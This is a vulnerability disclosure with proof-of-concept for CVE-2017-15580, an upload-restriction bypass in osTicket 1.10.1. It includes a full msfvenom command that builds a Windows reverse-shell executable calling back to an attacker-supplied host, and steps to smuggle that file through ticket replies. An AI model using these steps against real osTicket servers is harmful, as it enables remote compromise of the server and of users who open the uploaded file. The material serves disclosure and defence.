osTicket 1.10.1 Shell Upload

osTicket version 1.10.1 suffers from a remote shell upload vulnerability.


MD5 | 91d3007b10106697abc4881dc25ab268

Reference: https://becomepentester.blogspot.ae/2017/10/osTicket-File-Upload-
Restrictions-Bypassed-CVE-2017-15580.html

*# Exploit Title: File Upload Restrictions Bypassed*
*# Date: 18 October, 2017*
*# Exploit Author: Rajwinder Singh*
*# Vendor Homepage: http://osticket.com/ <http://osticket.com/>*
*# Software Link: http://osticket.com/download/go?dl=osTicket-v1.10.1.zip
<http://osticket.com/download/go?dl=osTicket-v1.10.1.zip>*
*# Version: v1.10.1*
*# CVE : 2017-15580*

Vulnerability Details:
======================
osTicket application provides a functionality to upload 'html' files with
associated formats. However, application does not properly validate the
uploaded fileas contents and thus accepts any type of files.

*Proof-of-Concept:*
====================
Uploaded shell to get reverse shell of end user for the demo purpose.

1. Created a valid '.html' file to bypass client-side validations.
<html>
<title>test</title>
<body>
<p>test page</p>
</body>

</html>

2. Created a reverse shell with '.exe' file extension using msfvenom.
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=<YOUR
IP> LPORT=4444 -b "\x00" -e <encoder> -f exe -o reverse.exe
https://www.offensive-security.com/metasploit-unleashed/binary-payloads/

3. As shown in the below screenshot, intercepted the request and changed
file extension '.html' to '.exe' and received a valid response from server
along with uploaded malicious file.


<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwhOmp9Tox-ijp-dsHXt3x7-0Bcs2AUzr_p2DzCvLY21vPBE0gHc4CYAsif_fkuR2MKesgbZSKkoC2Ncdeod8N5b32D3qj3QNJ7ZElrj7n3wJputWfSGeASJ-Lp1_A44noNoz4qN-gvpY/s1600/1.file_upload_extension_bypass.JPG>



*Response:*
<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUVmMkXsMdADSo_yOGMr8iwFJ1swO4LqIBHmOKu0hJBxNMx7l-wLBjfwIWSJAbuhRRcBj-KvdIAQ0S88tYayVw9jxwePN_vD4-rRxvKF5MBGlB11XRRfl9VPTqDirBkISBIz6xdn4ZgmU/s1600/2.file_upload_extension_bypass.JPG>

4. As shown in the below screenshot, successfully uploaded malicious file
on the server.
<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu4akZHBAIEzMjPg68kVrMxKs3oCcytjkfc_J49A6Gt0TYgQTZ4EPrqOS4xS5NozHBqm7uGrYfqzcflyv3IVLuO2NR4XicwEDMzgFDGEvoxoCSvrGd3k0fmAYxV7eJvCp0Biz5Z3TefO0/s1600/3.file_upload_extension_bypass.JPG>

Ready to get reverse shell.

*Affected Component:*
====================
*Parameter:* tickets.php?id=<ticket_number>#reply


*Disclosure Timeline:*
=====================
Vendor Confirmation: 11 October, 2017
Mitre Notification: 17 October, 2017
Public Disclosure: 18 October, 2017

*Exploitation Technique:*
=======================
Remote

*Severity Level:*
================
High

*Description:*
=====================================================
Request Method(s): [+] POST
Vulnerable Product: [+] osTicket - v1.10.1
Vulnerable Parameter(s): [+] tickets.php?id=<ticket_number>#reply



Thank you

Related Posts